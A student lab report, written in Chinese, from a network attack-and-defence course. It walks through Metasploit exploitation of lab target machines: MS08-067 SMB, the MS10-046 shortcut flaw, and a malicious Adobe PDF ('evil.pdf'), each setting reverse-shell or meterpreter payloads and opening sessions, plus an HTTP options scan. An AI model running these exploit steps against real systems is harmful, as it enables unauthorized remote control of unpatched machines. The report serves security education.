20155233 《网络对抗》 Exp5 MSF基础应用

主动攻击:ms08_067漏洞攻击

  1. 启用msf终端msfconsole然后使用search命令搜索该漏洞对应的模块:search ms08_067
    1071472-20180422100349622-1924192743.jpg

  2. 选择输入use exploit/windows/smb/ms08_067_netapi,之后查看信息:show payloads,选择攻击载荷set payload generic/shell_reverse_tcp

  3. 查看配置渗透攻击所需的配置项show options,查看渗透攻击模块所能成功渗透攻击的目标平台show targets
    1071472-20180422100358916-317205505.jpg
    1071472-20180422100412934-934486456.jpg

  4. 根据目标情况配置渗透攻击的各个选项
    1071472-20180422161857864-2057859280.png

  5. 回连成功,进行相关命令测试
    1071472-20180422162100039-1656020685.png

对浏览器攻击:ms10_046漏洞攻击

  1. 基本步骤同上,先利用指令search ms10_046找到可以攻击的模块
    1071472-20180422163139025-992447235.jpg

  2. 我们这里选择第一个,输入命令use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
    1071472-20180422164723547-513098352.jpg

  3. 输入show payloads选择攻击载荷,我们选择generic/shell_reverse_tcp,输入命令set payload generic/shell_reverse_tcp使用
    1071472-20180422164831984-1064500435.jpg

  4. 根据目标情况配置渗透攻击的各个选项,输入命令show options查看配置设置并进行修改
    1071472-20180422165526721-158317469.jpg

  5. 输入exploit执行
    1071472-20180422165855214-341094208.jpg

  6. 可以看到生成了所需的URL,在靶机浏览器访问后,kal得到相应但没有出现预期效果
    1071472-20180422170448647-1908156699.jpg

  7. 对配置进行修改,选用set payload windows/meterpreter/reverse_tcp,设置后查看结果,输入sessions查看到一个ID号为1的会话
    1071472-20180422172746260-623248167.jpg

  8. 使用sessions -i 1选择会话1,成功获取了靶机的shell,利用systeminfo指令查看靶机的系统信息
    1071472-20180422173103086-1285867508.jpg

对Adobe的漏洞攻击:adobe_pdf_embedded_exe

  1. 输入search adobe查询和adobe漏洞有关的模块,我选择exploit/windows/fileformat/adobe_pdf_embedded_exe
    1071472-20180422175016681-417149406.jpg

  2. 选择攻击载荷payload,这里我选windows/meterpreter/reverse_tcp
    1071472-20180422175314023-11606195.jpg

  3. 输入命令set payload windows/meterpreter/reverse_tcp使用攻击载荷
    1071472-20180422175621394-178033178.jpg

  4. 根据目标情况配置渗透攻击的各个选项
    1071472-20180422175714695-1006341450.jpg

  5. 执行,查看结果
    1071472-20180422175755967-237023066.jpg

  6. 可以看到在相应目的生成了evil.pdf,我们来将它发送到靶机
  7. 输入相关命令打开监听
    1071472-20180422182323597-476718988.jpg

  8. 回连成功,输入命令查看系统信息
    1071472-20180422182526521-1368316016.jpg

辅助模块的应用:scanner/http/options,功能Display available HTTP options for each system

  1. 输入命令show auxiliary查看辅助模块,并挑选使用scanner/http/options
  2. 输入命令use scanner/http/options,输入info查看信息
    1071472-20180424110214812-868015290.jpg
  3. 设置参数
    1071472-20180424112752719-1451449659.jpg

  4. exploit执行
    1071472-20180424110137525-1420861682.jpg

基础问题回答

  1. 用自己的话解释什么是exploit,payload,encode.
    exploit是漏洞利用,我们执行exploit后,我们所运送的程序或代码就开始去寻找漏洞,并控制它为我们服务。
    payload是有效载荷,在我们执行exploit后,谁来运送程序或代码呢?这个payload就是关键的一个环节。
    encode是编码,对我们的程序或代码进行伪装,使其避免被查收。

实验体会

通过本次实验,使我加深了对平时计算机下补丁的意识,本次实验是让我们知道如何根据特定漏洞去攻击特定系统,一个漏洞只能攻击没有装相应补丁的系统,可想而知漏洞的重要性,如果漏洞被发现,而没有装补丁,我们的系统就赤裸裸的暴露在黑客手下,而我们却毫不自知,所以我们要及时安装补丁,要养成网络安全意识,尽可能避免病毒、木马的入侵,提高专业知识,掌握相应技能。

转载于:https://www.cnblogs.com/l20155233/p/8905885.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值